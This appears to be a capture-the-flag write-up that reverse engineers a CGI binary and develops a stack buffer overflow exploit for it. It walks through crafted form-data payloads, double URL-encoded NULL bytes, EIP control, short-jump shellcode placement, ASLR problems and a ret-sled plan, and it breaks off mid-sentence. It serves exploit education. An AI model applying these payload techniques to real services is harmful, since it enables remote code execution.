There are a few things that jump out at me right away. The first is the use of the alloca() function. The man page for alloca states “The alloca() function allocates size bytes of space in the stack frame of the caller. This temporary space is automatically freed when the function that called alloca() returns to its caller.” Thus, we are dynamically growing the stack based upon file_name_size. This function call ends up being just a “sub esp” instruction in the assembly code, so don’t expect to see an import to alloca in the ELF header.

The next thing I notice are the case statements looking for 4 character string patterns of: Genr, Time, Date, PixY, and PixX. IDA shows these in little endian (backwards) format. The program checks for a % character in the filename input that is followed by four more characters and then another % character. Thus, we are looking for DOS style variables like %Genr%. It turns out all of these variables are passed in as the third argument to the interesting function.
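
If the backwards constants look odd, this short Python 3 sketch shows where they come from. The helper name as_ida_constant is made up for illustration; it loads the four tag bytes as a little endian DWORD and then prints that value most significant byte first, which is how the decompiler displays it.

```python
import struct

PLACEHOLDERS = ["Genr", "Time", "Date", "PixY", "PixX"]


def as_ida_constant(tag: str) -> str:
    """Show how a 4-byte tag reads when displayed as a multi-character constant."""
    # The program loads the four bytes from memory as one little-endian DWORD.
    value = struct.unpack("<I", tag.encode("ascii"))[0]
    # Printing that DWORD most significant byte first reverses the text.
    return value.to_bytes(4, "big").decode("ascii")


for tag in PLACEHOLDERS:
    print(tag, "->", as_ida_constant(tag))
```

Running it prints pairs such as Genr -> rneG and Time -> emiT, matching the constants in the decompilation.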

They are built into a structure that is 0x30 bytes long. First the sizes are built with calls to v3 = cgiGetValue((int)s_cgi, “base”); and the like. Then the strings for the variables are built immediately before the sizes. The IDA decompilation of the main function does not identify this as a structure. However, the memset(&v3, 0, 0x30u); and the fact that only v3 is passed into a function that clearly needs all of these variables is a big clue that this is a structure, or an array of structures, instead of 12 individual variables. The v3 variable in main() (or a1 in interesting()) ends up looking like this:

struct v3 {
	char * filename;
	unsigned int file_name_size;
	char * genr_str;
	unsigned int genr_size;
	char * time_str;
	unsigned int time_size;
	char * date_str;
	unsigned int date_size;
	char * pixy_str;
	unsigned int pixy_size;
	char * pixx_str;
	unsigned int pixx_size;
};
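
As a sanity check on that layout, the following Python 3 sketch models the structure as twelve 4-byte fields (pointers and unsigned ints are both 4 bytes on 32-bit x86) and derives each field offset. The names FIELDS, LAYOUT and OFFSETS are mine; the offsets can be compared against the a1 + N accesses in the decompiled function.

```python
import struct

# Field order taken from the struct above.
FIELDS = [
    "filename", "file_name_size",
    "genr_str", "genr_size",
    "time_str", "time_size",
    "date_str", "date_size",
    "pixy_str", "pixy_size",
    "pixx_str", "pixx_size",
]

LAYOUT = struct.Struct("<12I")  # twelve little-endian 32-bit fields
OFFSETS = {name: 4 * index for index, name in enumerate(FIELDS)}

print(hex(LAYOUT.size))
for name in FIELDS:
    print("a1 + %2d  %s" % (OFFSETS[name], name))
```

The total comes out to 0x30 bytes, the same size passed to memset() in main(), and time_str/time_size land at offsets 16 and 20, which are the ones read in the 'emiT' case.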

Have you spotted the bug yet? If not, go back to what is happening with our input in the interesting function. We pass this structure into our function, alloca (file_name_size * 2) and then what? We start copying into this array. It’s the qmemcpy calls that are in question here. These are presented in assembly as rep movsb instructions. Ask yourself how much data is being copied and what is the size of the destination buffer? Do you control the data being copied into the buffer? What variables are being updated in the loops to affect the starting offsets of the copy? Study the code and see if you can answer some of these questions. Do it now, I will wait.

Vulnerability Discovery

What you might notice is that after the program takes the length of file_name, doubles it, and allocates that amount of space on the stack, it will then proceed to copy in the values for the other variables from the structure. For example, if I set the filename “foobar” (name=”photo”; filename=”foobar” in my formdata file) and then if I set the Time input to be AAAAAA the CGI program will allocate 14 bytes on the stack (length of “foobar\0” * 2) and then copy in the value of the %Time% variable, which would also be 6 bytes. This will be clearer when looking at the actual input file.
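
To make the sizes concrete, here is a rough Python 3 model of the expansion loop. It is a simplification and not the real code: the name expand is mine, it assumes file_name_size counts the trailing NUL, and it ignores the buffer growth branch seen in the decompilation. It only compares how many bytes are reserved with how many get written.

```python
def expand(filename: bytes, values: dict) -> tuple:
    """Return (bytes_allocated, bytes_written) for a simplified expansion."""
    size = len(filename) + 1   # assumption: the size includes the trailing NUL
    allocated = 2 * size       # models alloca(2 * file_name_size)
    written = 0
    i = 0
    while i < len(filename):
        # A placeholder is '%', four name characters, then another '%'.
        if filename[i:i + 1] == b"%" and filename[i + 5:i + 6] == b"%":
            name = filename[i + 1:i + 5]
            if name in values:
                # The whole value is copied; nothing compares it to `allocated`.
                written += len(values[name])
            i += 6
        else:
            written += 1       # ordinary characters are copied one at a time
            i += 1
    return allocated, written


print(expand(b"foobar", {}))
print(expand(b"%Time%", {b"Time": b"A" * 92}))
```

For "foobar" this gives 14 bytes reserved and 6 written. For a filename of %Time% with a 92 byte value, it gives 14 bytes reserved and 92 written.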

The bug comes in if we make the length of Time larger than the length of file_name while having file_name reference %Time%. There is no check to see if we have enough stack space left. This is a stack overflow. The only issue is that if we try to encode a %Time% variable directly into the file_name then the program never gets to the interesting function! For clarity, this is what the formdata file looks like now for testing:

-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%Time%"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
-----------------------------13141138687192
Content-Disposition: form-data; name="Time"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----------------------------13141138687192--

The %Time% bit does not parse correctly and we miss the check for % in the filename. This is because the variables are being URL decoded. If I set it to %25Time%25 it will decode properly as %Time% (0x25 = ‘%’). The other problem I ran into with this input is that, although the %Time% placeholder in the filename is case sensitive, the value itself is looked up under the lowercase name when the time pointer and size are set in the structure. So, name=”time” and filename=”%25Time%25” will produce the following crash:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb7fd9000 --> 0x0
EBX: 0x1000
ECX: 0x41414141 ('AAAA')
EDX: 0x80500a6 --> 0x0
ESI: 0x41414141 ('AAAA')
EDI: 0xb7fd9000 --> 0x0
EBP: 0xbffff638 ('A'<repeats 46 times>)
ESP: 0xbffff60a ('A'<repeats 92 times>)
EIP: 0x804cfa2 (rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi])
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804cf9a:   mov    edi,eax
   0x804cf9c:   mov    esi,DWORD PTR [ebp-0x14]
   0x804cf9f:   mov    ecx,DWORD PTR [ebp-0x18]
=> 0x804cfa2:   rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi]
   0x804cfa4:   mov    ebx,DWORD PTR [ebp+0x8]
   0x804cfa7:   mov    DWORD PTR [ebx],eax
   0x804cfa9:   mov    eax,DWORD PTR [ebp-0x18]
   0x804cfac:   mov    DWORD PTR [ebx+0x4],eax
[------------------------------------stack-------------------------------------]
0000| 0xbffff60a ('A'<repeats 92 times>)
0004| 0xbffff60e ('A'<repeats 88 times>)
0008| 0xbffff612 ('A'<repeats 84 times>)
0012| 0xbffff616 ('A'<repeats 80 times>)
0016| 0xbffff61a ('A'<repeats 76 times>)
0020| 0xbffff61e ('A'<repeats 72 times>)
0024| 0xbffff622 ('A'<repeats 68 times>)
0028| 0xbffff626 ('A'<repeats 64 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804cfa2 in ?? ()
gdb-peda$

Huzzah! We’ve exercised the stack overflow and crashed on a memcpy(). If we can get the function to return we will have control over EIP. We are actually really close to the function return at this point as well. The ret instruction is at 0x0804CFB0, just a short 14 bytes away.

Let’s see if we can get around this crash. The rep movs instruction will move ECX number of bytes from the pointer in ESI to the pointer in EDI. Here, ECX is set to 0x41414141. Clearly we overwrote the size used in this copy. We could look at the stack frame and do the math with the allocas to figure out exactly which offset the counter is coming from, but it is faster to just put in a string pattern in the time variable.

We run it again with formdata of:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
Content-Disposition: form-data; name="time"

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV
-----------------------------13141138687192--

Debugging this gives us the following:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb7fd9000 --> 0x0
EBX: 0x1000
ECX: 0x47474646 ('FFGG')
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0xbffff638 ("LLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV")
ESP: 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV")
EIP: 0x804cfa2 (rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi])
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804cf9a:   mov    edi,eax
   0x804cf9c:   mov    esi,DWORD PTR [ebp-0x14]
   0x804cf9f:   mov    ecx,DWORD PTR [ebp-0x18]
=> 0x804cfa2:   rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi]
   0x804cfa4:   mov    ebx,DWORD PTR [ebp+0x8]
   0x804cfa7:   mov    DWORD PTR [ebx],eax
   0x804cfa9:   mov    eax,DWORD PTR [ebp-0x18]
   0x804cfac:   mov    DWORD PTR [ebx+0x4],eax
 [------------------------------------------------------------------------------]
Stopped reason: SIGSEGV
0x0804cfa2 in ?? ()
gdb-peda$
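
Turning the register values above into offsets within the time value is mechanical. This Python 3 sketch rebuilds the same AAAABBBB... pattern and searches it for the little endian bytes of a register; the helper name pattern_offset is my own.

```python
import struct

# Same pattern as the time value above: each letter A..V repeated four times.
PATTERN = "".join(ch * 4 for ch in "ABCDEFGHIJKLMNOPQRSTUV").encode("ascii")


def pattern_offset(register_value: int) -> int:
    """Offset in PATTERN of the 4 bytes that ended up in a 32-bit register."""
    return PATTERN.find(struct.pack("<I", register_value))


print(pattern_offset(0x47474646))  # ECX ('FFGG') -> 22
print(pattern_offset(0x48484747))  # ESI ('GGHH') -> 26
```

So the copy length read into ECX sits 22 bytes into the time value, and the source pointer read into ESI follows it at 26.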

We can go back to our input file and replace the “FFGG” with NULLs so that no copy is executed. My first attempt was to inject raw NULL bytes into this file. I ran the following Python session to get the job done. It’s not pretty, but it worked. I could also have used vi with %!xxd and %!xxd -r or any other hex editor to make these changes.

$ python
Python 2.7.5+ (default, Feb 27 2014, 19:39:55)
[GCC 4.8.1] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> a=open("formdata","rb")
>>> t=a.read()
>>> t.find("FFGG")
286
>>> l=t.find("FFGG")
>>> t[l:l+4]
'FFGG'
>>> def strow(instr, owstr, offset):
...   return instr[:offset] + owstr + instr[offset+len(owstr):]
...
>>> p=strow(t, "\0\0\0\0", 286)
>>> y=open("file2","wb")
>>> y.write(p)
>>> y.close()

While the Python script properly modified the file, this technique did not work. ECX, instead of NULL, was set to 0x2d2d2d2d or “----”. This value is coming from our boundary on the multipart data. I assumed that the NULL bytes must be causing early termination of string parsing routines. What if we URL encode the NULL bytes?

Setting the time variable to “AAAABBBBCCCCDDDDEEEEFF%00%00%00%00GGHHHHIIII” and debugging once again yields:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata
Content-type: text/html
Cookie: AA==<p>ERROR: 906</p><meta http-equiv='refresh' content='0;url=../thanks.php'>[Inferior 1 (process 1834) exited normally]
Warning: not running or target is remote
gdb-peda$

Well that was a step in the wrong direction! There is no crash now. We are seeing the ERROR: 906 coming back, which is what happens when the photo file being uploaded fails to open. The cookie coming back to us in the HTTP header is the name of this file. The base64 decoding of “AA==“ is 0x00, so it is understandable that that file did not open. I think we are running into similar issues with the string parsing again. This is as far as I got during the actual CTF.
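
The cookie values are easy to verify. This Python 3 snippet decodes the cookie from this run and, for comparison, the one from the earlier successful upload.

```python
import base64

# Cookie from this run: a single NUL byte.
print(base64.b64decode("AA=="))      # b'\x00'

# Cookie from the earlier successful run: "base" plus a trailing NUL.
print(base64.b64decode("YmFzZQA="))  # b'base\x00'
```

The earlier value lines up with the file named base that showed up in the photos directory.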

It was not until afterwards that it was pointed out to me that we can double URL encode the NULL values. If URL encoding once makes 0x00 = %00 then URL encoding twice will be 0x00 = %00 = %25%30%30. With my formdata file now looking like this:

-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
Content-Disposition: form-data; name="time"

AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP
-----------------------------13141138687192--

We get a debugger output of:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb7fd9000 --> 0x0
EBX: 0x4f4f4e4e ('NNOO')
ECX: 0x0
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0xbffff638 ("LLMMMMNNNNOOOOPPPP")
ESP: 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFF")
EIP: 0x804cfa7 (mov    DWORD PTR [ebx],eax)
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804cf9f:   mov    ecx,DWORD PTR [ebp-0x18]
   0x804cfa2:   rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi]
   0x804cfa4:   mov    ebx,DWORD PTR [ebp+0x8]
=> 0x804cfa7:   mov    DWORD PTR [ebx],eax
   0x804cfa9:   mov    eax,DWORD PTR [ebp-0x18]
   0x804cfac:   mov    DWORD PTR [ebx+0x4],eax
   0x804cfaf:   leave
   0x804cfb0:   ret
[------------------------------------stack-------------------------------------]
0000| 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFF")
0004| 0xbffff60e ("BBBBCCCCDDDDEEEEFF")
0008| 0xbffff612 ("CCCCDDDDEEEEFF")
0012| 0xbffff616 ("DDDDEEEEFF")
0016| 0xbffff61a ("EEEEFF")
0020| 0xbffff61e --> 0x4646 ('FF')
0024| 0xbffff622 --> 0x47470000 ('')
0028| 0xbffff626 ("HHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804cfa7 in ?? ()
gdb-peda$
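
The effect of the double encoding can be reproduced offline. This Python 3 sketch assumes the field goes through two rounds of standard percent-decoding, which is what the behavior above suggests; it uses Python's urllib rather than cgilib's decoder, and the helper name decode_layers is mine.

```python
from urllib.parse import unquote_to_bytes


def decode_layers(field: bytes, layers: int) -> bytes:
    """Apply percent-decoding to `field` the given number of times."""
    for _ in range(layers):
        field = unquote_to_bytes(field)
    return field


print(decode_layers(b"%25%30%30", 1))   # b'%00'
print(decode_layers(b"%25%30%30", 2))   # b'\x00'
print(decode_layers(b"%25Time%25", 1))  # b'%Time%'
```

One round turns %25%30%30 into the text %00, and only the second round produces the actual NULL byte.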

Awesome, we got past the rep movs with a NULL ECX and we are now 9 bytes away. The crash is now on the instruction 0x804cfa7: mov DWORD PTR [ebx],eax where EBX is 0x4f4f4e4e. We are writing EAX to this pointer. We can set this to be anywhere in memory that is writeable to avoid this crash. At the offset for “NNOO” let’s put in 0x0804F0EC, which is just past the end of the .BSS section. That address is mapped into our memory space and will be NULL and unused throughout the program. We will need to little endian encode and URL encode this pointer resulting in: %EC%F0%04%08.
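
Doing the byte swap and the percent-encoding by hand is error prone, so here is a small Python 3 helper for it. The name url_encode_pointer is hypothetical; it packs a 32-bit address in little endian order and percent-encodes every byte.

```python
import struct


def url_encode_pointer(address: int) -> str:
    """Pack a 32-bit address little endian and percent-encode each byte."""
    return "".join("%{:02X}".format(byte) for byte in struct.pack("<I", address))


print(url_encode_pointer(0x0804F0EC))  # %EC%F0%04%08
```

The same helper works for any other 32-bit address that needs to go into the time value.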

Now with a formdata file of:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
Content-Disposition: form-data; name="time"

AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNN%EC%F0%04%08OOPPPP
-----------------------------13141138687192--

We get a debugger output of:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x804f0ec --> 0xb7fd9000 --> 0x0
ECX: 0x0
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0x4d4d4c4c ('LLMM')
ESP: 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
EIP: 0x4e4e4d4d ('MMNN')
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x4e4e4d4d
[------------------------------------stack-------------------------------------]
0000| 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
0004| 0xbffff644 ("OOPPPP")
0008| 0xbffff648 --> 0xff005050
0012| 0xbffff64c --> 0x1
0016| 0xbffff650 --> 0xb7e2bb98 --> 0x2a5c ('\\*')
0020| 0xbffff654 --> 0xb7fdc858 --> 0xb7e1f000 --> 0x464c457f
0024| 0xbffff658 --> 0xbffff866 ("/home/bool/nonameyet.cgi")
0028| 0xbffff65c --> 0x80500a0 ("%Time%")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x4e4e4d4d in ?? ()
gdb-peda$

Excellent! EIP: 0x4e4e4d4d. I can now control the next instruction that this program executes. Our goal is to send EIP back to a buffer that we control. Let’s find everywhere in memory that our input string exists:

gdb-peda$ searchmem AAAABBBB
Searching for 'AAAABBBB' in: None ranges
Found 3 results, display max 3 items:
 [heap] : 0x80501b8 ("AAAABBBBCCCCDDDDEEEEFF")
 mapped : 0xb7fda108 ("AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNN%EC%F0%04%08OOPPPP\r\n", '-'<repeats 29 times>, "13141138687192--\r\n")
[stack] : 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFF")
gdb-peda$ vmmap
Start      End        Perm      Name
0x08048000 0x0804e000 r-xp      /home/bool/nonameyet.cgi
0x0804e000 0x0804f000 r-xp      /home/bool/nonameyet.cgi
0x0804f000 0x08050000 rwxp      /home/bool/nonameyet.cgi
0x08050000 0x08071000 rwxp      [heap]
0xb7e1e000 0xb7e1f000 rwxp      mapped
0xb7e1f000 0xb7fcd000 r-xp      /lib/i386-linux-gnu/libc-2.17.so
0xb7fcd000 0xb7fcf000 r-xp      /lib/i386-linux-gnu/libc-2.17.so
0xb7fcf000 0xb7fd0000 rwxp      /lib/i386-linux-gnu/libc-2.17.so
0xb7fd0000 0xb7fd3000 rwxp      mapped
0xb7fd9000 0xb7fdd000 rwxp      mapped
0xb7fdd000 0xb7fde000 r-xp      [vdso]
0xb7fde000 0xb7ffe000 r-xp      /lib/i386-linux-gnu/ld-2.17.so
0xb7ffe000 0xb7fff000 r-xp      /lib/i386-linux-gnu/ld-2.17.so
0xb7fff000 0xb8000000 rwxp      /lib/i386-linux-gnu/ld-2.17.so
0xbffdf000 0xc0000000 rwxp      [stack]

I have three choices for direct execution: heap, mapped, or stack. All of the sections are executable. If I run the binary again and do the same search we can determine if any of these sections are affected by ASLR. They all looked stable between runs to me. Remember this for later.

My preference is to use the mapped section because it looks like it has a complete copy of the data exactly as I sent it in. Other options here are to look for more input vectors, specifically cookies and other variables. Let’s use python again to set the “AAAA” in our input to \xcc\xcc\xcc\xcc so that we might trigger an int 3 debugging break point.

Next, let’s overwrite the “MMNN” offset that was in EIP with the little endian URL encoded address of %08%a1%fd%b7 (0xb7fda108) that should point directly to the start of our data (int 3) in the mapped section. If all goes well, we should expect to see a SIGTRAP.

The formdata file is:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
Content-Disposition: form-data; name="time"

▒▒▒▒BBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMM%08%a1%fd%b7%EC%F0%04%08OOPPPP
-----------------------------13141138687192--

The debugger output is:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata

Program received signal SIGTRAP, Trace/breakpoint trap.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x804f0ec --> 0xb7fd9000 --> 0x0
ECX: 0x0
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0x4d4d4c4c ('LLMM')
ESP: 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
EIP: 0xb7fda109 --> 0x42cccccc
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xb7fda0fc:  gs
   0xb7fda0fd:  cmp    eax,0x6d697422
   0xb7fda102:  and    cl,BYTE PTR gs:0xcc0a0d0a
=> 0xb7fda109:  int3
   0xb7fda10a:  int3
   0xb7fda10b:  int3
   0xb7fda10c:  inc    edx
   0xb7fda10d:  inc    edx
[------------------------------------stack-------------------------------------]
0000| 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
0004| 0xbffff644 ("OOPPPP")
0008| 0xbffff648 --> 0xff005050
0012| 0xbffff64c --> 0x1
0016| 0xbffff650 --> 0xb7e2bb98 --> 0x2a5c ('\\*')
0020| 0xbffff654 --> 0xb7fdc858 --> 0xb7e1f000 --> 0x464c457f
0024| 0xbffff658 --> 0xbffff866 ("/home/bool/nonameyet.cgi")
0028| 0xbffff65c --> 0x80500a0 ("%Time%")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGTRAP
0xb7fda109 in ?? ()
gdb-peda$

Great! We have arbitrary code execution now. Unfortunately, the start of our string only affords us 22 bytes of execution before we run into the NULL encoded ECX register from earlier. We now have two options. The first is to make the filename larger than %25Time%25 so that more stack is allocated and our offsets are further into the file. The second option I see is to encode a short relative jump instruction in place of the int 3. Because we are doing this from a flat file and not an exploit script it would be very easy to lose track of shifting offsets, so I opted for the second option.

Currently, the start of the “OOPP” that ends our input string is 105 bytes away. I can encode a short jump as %eb%67 to land right on my data: the displacement 0x67 (103) is counted from the end of the two-byte jump instruction, so execution resumes 105 bytes past the start of the jump. After a bit of trial and error building the input file I was able to line everything up just right and gain code execution when running in gdb. I simply replaced the “OOPPPP” with my shellcode to open /home/nonameyet/flag, read it to the stack, and write it to stdout. Note that this shellcode would not trigger the .bash_alias backdoor from earlier!

However, when I run it outside of the debugger I get a segmentation fault. This is a common annoyance when writing exploits. Things can change when they are being debugged. I ran a strace command to see if any of the shellcode was making system calls:

$ strace ./nonameyet.cgi < formdata2
…
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0xb76ff000
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xb7fda108} ---
+++ killed by SIGSEGV (core dumped) +++

Nope, I never got execution. With si_addr=0xb7fda108 I am at least still jumping to the correct spot. What I notice is that the mmap call is returning 0xb76ff000. This is not what I was seeing as a consistent address for my data on the 0xb7fda000 page. So, that address does not exist and we need to go back to pick one of the other two points where we have code. Let’s pick the heap this time with an address of 0x080501b8 as our new EIP.

After modifying the formdata file again and setting a break point on the return from the interesting function, it looks like the heap address has moved as well. It is now at [heap] : 0x8050318 (“AAAABBBBCCCCDDDDEEEEFF”). I suspect that this changed because our input lengths have changed since I last looked. I’ve added shellcode now after all.

The base address for the heap is still in the same spot: 0x08050000. It is just the offset within that page that has shifted. Let’s put in the new address for EIP and try our luck with yet another run. The other thing that is different about this heap location is that all of our data has already been URL decoded. Thus, we will need to URL encode all of our binary values. This includes the shellcode.

This time it hits a SIGTRAP again and we can redo our relative short jump calculation to land on arbitrary shellcode. We are executing at 0x08050318 and we need to jump to 0x08050352, or 58 bytes away. The displacement of a short jump is counted from the end of the two-byte instruction, so it is 56 (0x38), which means we should use an opcode of “\xeb\x38”. Setting this at the start jumps perfectly to our shellcode, which now executes just fine in the debugger. Again.
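
Since this calculation has now come up twice, here is a small Python 3 sketch of it. The helper name short_jmp is my own; it encodes the x86 short jump (opcode 0xEB followed by a signed 8-bit displacement measured from the end of the two-byte instruction).

```python
def short_jmp(src: int, dst: int) -> bytes:
    """Encode a `jmp rel8` placed at address src that lands on address dst."""
    rel = dst - (src + 2)  # displacement is relative to the next instruction
    if not -128 <= rel <= 127:
        raise ValueError("target out of range for a short jump")
    return bytes([0xEB, rel & 0xFF])


print(short_jmp(0x08050318, 0x08050352).hex())  # eb38
print(short_jmp(0, 105).hex())                  # eb67
```

The first call is the heap case above, and the second is the earlier 105 byte jump in the mapped section.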

But, once again, running without the debugger attached produces a crash! It appears that the heap moves as well. This makes logical sense. If the mmap call is moving and the heap is allocated in a similar way, then they both should move with ASLR. We could try the stack location by building in a large NOP (\x90) sled before our shellcode and go about guessing stack addresses despite ASLR, brute forcing the return address used for EIP. I’ve shamefully used this technique in past CTF events with success.

The whole problem here, and the reason I’ve failed to exploit twice, is that GDB has disabled ASLR. Remember when I checked it earlier? I could have saved myself a lot of time if I had realized this back then. While having your debugger turn off ASLR makes debugging easier, it leads to false hope. Let this be a lesson to always run the set disable-randomization off command in GDB when starting exploit development on a binary. I believe this default ASLR disabled state is actually coming from the PEDA GDB init script I am using. I have another idea that should work with ASLR.

Remember that data structure passed into the interesting function? Well, there is no reason why we only have to fill out the “filename” and “time” variables. If we set the “date” variable there will be a pointer to the date value on the stack. We can put our shellcode in there and use a technique called a return sled to get down the stack.

Here is a short debugging session showing the stack at the beginning of the interesting function:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ break *0x0804CE3B
Breakpoint 1 at 0x804ce3b
gdb-peda$ set args < formdata3
gdb-peda$ r

Breakpoint 1, 0x0804ce3b in ?? ()
gdb-peda$ stack 20
0000| 0xbffff63c --> 0x80492eb (test   eax,eax) # return address in main()
0004| 0xbffff640 --> 0xbffff65c --> 0x80500a0 ("%Time%")
0008| 0xbffff644 --> 0xbffff68c --> 0xe
0012| 0xbffff648 --> 0xffffffff
0016| 0xbffff64c --> 0x1
0020| 0xbffff650 --> 0xb7e2bb98 --> 0x2a5c ('\\*')
0024| 0xbffff654 --> 0xb7fdc858 --> 0xb7e1f000 --> 0x464c457f
0028| 0xbffff658 --> 0xbffff866 ("/home/bool/nonameyet.cgi")
0032| 0xbffff65c --> 0x80500a0 ("%Time%")
0036| 0xbffff660 --> 0x7
0040| 0xbffff664 --> 0x0
0044| 0xbffff668 --> 0x0
0048| 0xbffff66c --> 0x80501b8 --> 0x414138eb   # this is the time variable
0052| 0xbffff670 --> 0x3b (';')                 # time variable length
0056| 0xbffff674 --> 0x8050348 --> 0xf0ec8166   # date variable
0060| 0xbffff678 --> 0x54 ('T')                 # date variable length
0064| 0xbffff67c --> 0x0
0068| 0xbffff680 --> 0x0
0072| 0xbffff684 --> 0x0
0076| 0xbffff688 --> 0x0
gdb-peda$

If we replace our original return address with 0x08048945 (the address of a ret instruction) and then immediately following this address place the same address again, the program will return twice and the stack pointer will be incremented by 8. We can do this all the way down the stack until we reach our pointer to the date variable. A little math, (0xbffff674 - 0xbffff63c) / 4 = 14, tells us that we need to put the pointer to the ret instruction on the stack 14 times to reach the pointer to our shellcode.
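The sled length calculation can be sketched in Python as follows. This is only an illustration of a plain ret sled using the stack addresses from the GDB session above; the constant names are invented for the example, and it ignores any constraints on individual stack slots.

```python
import struct

SAVED_EIP_SLOT = 0xBFFFF63C  # stack slot holding the return address into main()
DATE_PTR_SLOT = 0xBFFFF674   # stack slot holding the pointer to the date variable
RET_GADGET = 0x08048945      # address of a ret instruction in the binary

# Each ret consumes one 4-byte stack slot.
slots = (DATE_PTR_SLOT - SAVED_EIP_SLOT) // 4

# Addresses are stored little-endian on x86, then percent-encoded for the form.
sled = struct.pack("<I", RET_GADGET) * slots
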